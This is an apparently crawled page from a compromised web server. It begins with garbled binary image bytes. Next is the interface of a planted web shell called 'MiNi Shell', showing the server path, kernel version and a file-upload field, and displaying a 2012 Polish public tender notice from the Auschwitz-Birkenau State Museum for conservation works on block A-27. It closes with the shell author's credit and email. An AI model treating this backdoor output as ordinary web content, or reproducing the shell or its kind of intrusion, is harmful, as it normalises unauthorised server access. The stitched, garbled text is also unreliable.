JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120323/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120323/91188-N-2012.html

<p class="kh_header"><b>Oświęcim: Prace konserwatorskie elewacji, schodów zewnętrznych i opaski betonowej wraz z towarzyszącymi robotami budowlanymi bloku o nr inw. A-27 usytuowanego na terenie Państwowego Muzeum Auschwitz-Birkenau w Oświęcimiu.</b><br>
<b>Numer ogłoszenia: 91188 - 2012; data zamieszczenia: 23.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Muzeum Auschwitz-Birkenau w Oświęcimiu , ul. Więźniów Oświęcimia 20, 32-603 Oświęcim, woj. małopolskie, tel. 033 8432022, faks 033 8431934.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prace konserwatorskie elewacji, schodów zewnętrznych i opaski betonowej wraz z towarzyszącymi robotami budowlanymi bloku o nr inw. A-27 usytuowanego na terenie Państwowego Muzeum Auschwitz-Birkenau w Oświęcimiu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa polegająca na pracach konserwatorskich elewacji, schodów zewnętrznych i opaski betonowej obiektu dawnego KL Auschwitz I - bloku o nr inw.
 A-27, wraz z towarzyszącymi robotami budowlanymi polegającymi na wykonaniu podbudowy pod demontowane fragmenty opaski betonowej oraz schody zewnętrzne .
Budynek o nr  inw. A-27 to murowany, piętrowy blok mieszkalny dawniej przeznaczony dla więźniów, zachowany jako obiekt o charakterze wystawowym. Wchodzi on 
w skład zespołu budynków wzniesionych w latach 1916-1918  przez władze austriackie. 
W 1939 roku zostały one zajęte przez Niemców, a rok później znalazły się w obrębie utworzonego na tym terenie obozu Auschwitz I. W tym czasie przekształcono je 
i dostosowano do pełnienia nowych funkcji.  W okresie powojennym budynek został zaadaptowany na cele ekspozycyjne. Elewacja budynku wraz z najbliższym otoczeniem nie podlegała po wojnie  znacznym przekształceniom i zachowała historyczny charakter. 


1.1.	ZAKRES PRAC KONSERWATORSKICH i ROBÓT BUDOWLANYCH:
PRACE KONSERWATORSKIE:
1.	Konserwacja elewacji budynku: 
Konserwacja wątku ceglanego: dezynfekcja, wstępne wzmocnienie osłabionych fragmentów wątku, korekta wtórnych spoin, oczyszczenie całej elewacji (wybór metody oczyszczania należy poprzedzić próbami i ostateczny dobór metody uzgodnić oraz zakres i stopień doczyszczenia z Zamawiającym), uzupełnienie ubytków cegieł i spoin, scalenie kolorystyczne uzupełnień, impregnacja wzmacniająca i biobójcza oraz hydrofobizacja. (prace nie będą obejmować zakresów związanych z przemurowaniem kominów i wymianą nakryw żelbetowych kominów oraz konserwacją stolarki okiennej i drzwiowej - zakresy te zostały już  wykonane)
Konserwacja parapetów cementowych: Usunięcie wtórnych uzupełnień, oczyszczenie, impregnacja biobójcza, wzmocnienie strukturalne osłabionych partii zaprawy, uzupełnienie ubytków, hydrofobizacja.
2.	Konserwacja schodów zewnętrznych do budynku:
Konserwacja wykonanych z lastryka schodów zewnętrznych: elewacji południowo- wschodniej, północno-zachodniej i północno-wschodniej: oczyszczenie powierzchni lastryka, usunięcie zdegradowanych spoin, demontaż stopni lub ich elementów składowych (nie dotyczy schodów elewacji północno- wschodniej), wykonanie właściwej podbudowy (w razie konieczności - w ramach robót budowlanych), montaż elementów lastrykowych, uzupełnienie ubytków lastryka, spoinowanie, Impregnacja biobójcza, hydrofobizacja
konserwacja  betonowych stopni elewacji północno-zachodniej,  południowo-wschodniej i północno- wschodniej: Usunięcie wtórnych uzupełnień, oczyszczenie, Impregnacja biobójcza, wzmocnienie strukturalne osłabionych partii zaprawy, uzupełnienie ubytków, hydrofobizacja
3.	Konserwacja opaski betonowej (wraz z obramieniem zsypów):
Usunięcie wtórnych uzupełnień, oczyszczenie, dezynfekcja, impregnacja biobójcza, demontaż, sklejenie z użyciem dybli, montaż, uzupełnienie ubytków, hydrofobizacja.

ROBOTY BUDOWLANE :
1.	Wykonanie podbudowy pod konserwowane, przeznaczone do demontażu fragmenty opaski betonowej wokół budynku.
2.	Wykonanie podbudowy pod schody lastrykowe elewacji południowo-wschodniej 
i północno-zachodniej. Założono wykonanie podbudowy zgodnie z rozwiązaniem zaproponowanym dla podbudowy pod demontowane fragmenty opaski betonowej. Konieczność wykonania podbudowy zostanie potwierdzona po demontażu schodów, 
a  ewentualna modyfikacja sposobu wykonania podbudowy zostanie ustalona w ramach nadzoru autorskiego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>do 50% wartości zamówienia podstawowego obejmujące prace konserwatorskie elewacji, schodów zewnętrznych i opaski betonowej oraz towarzyszące roboty budowlane bloku o nr inw. A-27 usytuowanego na terenie Państwowego Muzeum Auschwitz-Birkenau w Oświęcimiu</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 92.52.20.00-6, 92.52.22.00-8, 45.21.23.14-0, 45.21.23.50-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.07.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Każda oferta musi być zabezpieczona wadium w wysokości: 7000 PLN  (słownie: siedem tysięcy  zł) 
2.	Wadium należy wnieść przed upływem terminu składania ofert.
3.	Wadium może być wniesione w jednej lub kilku następujących formach:
a.	pieniądzu przelewem, na konto Zamawiającego:
      Pekao S.A. III Oddział w Katowicach
IBAN:PL: 45 1240 2975 1111 0010 3268 4307
       (za datę wniesienia wadium w pieniądzu uważa się datę uznania na rachunku Zamawiającego),
b. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy musi być poręczeniem pieniężnym,
c. gwarancjach ubezpieczeniowych,
d. gwarancjach bankowych,
e. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania niezbędnej wiedzy i doświadczenia wyrażające  się wykonaniem na obiektach       wpisanych do rejestru zabytków, w okresie ostatnich 3 lat przed dniem składania ofert:
a)	minimum 3 prac konserwatorskich obejmujących swoim zakresem konserwację wątku ceglanego, w tym:
       - co najmniej jedna praca dotycząca konserwacji wątku ceglanego obejmująca prace  	konserwatorskie na powierzchni nie mniejszej niż 700  m2   i o wartości nie mniejszej niż 	250 000 PLN netto, 
b)	minimum 2  prac konserwatorskich obejmujących swoim zakresem konserwację elementów   wykonanych z zapraw mineralnych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia tj.:
1.2.1 Kierownikiem robót budowlanych posiadającym uprawnienia do kierowania robotami budowlanymi przy zabytkach nieruchomych wpisanych do rejestru zabytków zgodnie 
z Rozporządzeniem Ministra Kultury z dnia 27 lipca 2011r  w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych tj.  uprawnienia budowlane określone przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623, z późn. zm.) 
          oraz co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych wpisanych do rejestru zabytków.
1.2.2 Kierownikiem prac konserwatorskich posiadającym uprawnienia do prowadzenia prac konserwatorskich, prac restauratorskich lub badań konserwatorskich przy zabytkach nieruchomych wpisanych do rejestru zabytków zgodnie z Rozporządzeniem Ministra Kultury z dnia 27 lipca 2011r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych .
          Ponadto  kierownik prac konserwatorskich  musi posiadać: minimum 5-letnie (licząc od momentu uzyskania tytułu zawodowego magistra po ukończeniu właściwych studiów wyższych) doświadczenie zawodowe (rozumiane jako suma przepracowanych miesięcy) jako osoba nadzorująca lub kierująca pracami konserwatorskimi dotyczącymi konserwacji wątku ceglanego i elementów wykonanych z zapraw mineralnych w obiektach wpisanych do rejestru zabytków, z zastrzeżeniem, że doświadczenie to obejmuje w okresie ostatnich trzech lat przed  dniem składania ofert co najmniej 12 miesięczną aktywność zawodową w opisanym powyżej zakresie.
1.2.3	 zespołem realizującym prace konserwatorskie:
          w którym co najmniej 4 osoby to osoby wykwalifikowane, posiadające uprawnienia do prowadzenia prac konserwatorskich przy zabytkach, zgodnie z Rozporządzeniem Ministra Kultury z dnia  27 lipca 2011r  w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych 
i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych. 
         Osoby wchodzące w skład zespołu konserwatorskiego, posiadające kwalifikacje o których mowa 
w zdaniu poprzedzającym, winny być tak dobrane by:
a) co najmniej 2 osoby posiadały tytuł zawodowy magistra w specjalności związanej 
z konserwacją ceramiki budowlanej (cegły);
b) co najmniej 2 osoby posiadały tytuł zawodowy magistra w specjalności związanej 
z konserwacją zapraw mineralnych;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia rozumianej jako dysponowanie środkami lub posiadaniem zdolności kredytowej w wysokości nie mniejszej niż  250 000 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - właściwości wykonawcy - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Dopuszcza się zmianę zawartej umowy w sprawie zamówienia publicznego 
w stosunku do treści oferty, na podstawie której Zamawiający dokona wyboru Wykonawcy, w przypadkach: 
a.	udzielenia przez Zamawiającego zamówienia na prace dodatkowe lub uzupełniające o których mowa w art. 67 p.z.p., których realizacja będzie miała wpływ na realizację zakresu zamówienia podstawowego - w zakresie przedłużenia terminu wykonania przedmiotu umowy. 
b.	zmiany obowiązującej stawki VAT w okresie obowiązywania umowy, 
w zakresie wynagrodzenia Wykonawcy;
c.	w przypadku wystąpienia niekorzystnych warunków pogodowych uniemożliwiających realizację przedmiotu umowy, mających wpływ na terminy realizacji zadań określonych w Szczegółowym harmonogramie rzeczowo-finansowym - w zakresie przedłużenia terminu wykonania przedmiotu umowy;
d.	w przypadkach gdy na konieczność taką wskażą wyniki dodatkowych badań konserwatorskich lub pojawienia się niemożliwych wcześniej do przewidzenia reakcji konserwowanego materiału na prowadzone zabiegi konserwatorskie (także w przypadkach ujawnienia się po dniu zawarcia umowy innych udokumentowanych analogicznych przypadków w obiektach znajdujących się pod opieką Zamawiającego, w których wcześniej prowadzono prace konserwatorskie przy użyciu analogicznych metod), - w zakresie zmiany technologii prowadzenia prac konserwatorskich lub zmiany stosowanych preparatów określonych w programie prac konserwatorskich stanowiącym załącznik nr 1 do umowy;
e.	w przypadku wydanych w toku wykonywania umowy, zgodnie 
z obowiązującym prawem zaleceń Wojewódzkiego konserwatora zabytków, - 
stosownie w zakresie zmiany technologii prowadzenia prac konserwatorskich lub zmiany stosowanych preparatów określonych w programie prac konserwatorskich stanowiącym załącznik nr 1 do umowy;
f.	w przypadkach zaleceń autora programu prac konserwatorskich lub inspektora nadzoru konserwatorskiego - w zakresie stosowanych metod i środków;
g.	w przypadkach pojawienia się na rynku nowych preparatów do konserwacji o właściwościach lepszych od preparatów wskazanych w programie prac konserwatorskich - w zakresie zmiany stosowanych preparatów określonych w programach konserwatorskich, lub jeżeli ich użycie tego wymaga w zakresie zmiany technologii prowadzenia prac konserwatorskich;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.auschwitz.org<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowe Muzeum Auschwitz-Birkenau w Oświęcimiu, ul. Więźniów Oświęcimia 20, 32-603 Oświęcim, woj. małopolskie, tel. 033 844 8003, fax : 033 8431862..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.04.2012 godzina 13:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego tj. w: Oświęcim, ul. Więźniów Oświęcimia 20, budynek administracyjny  o nr inw. A-44, parter, biuro podawcze Muzeum - pokój nr 1.8..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com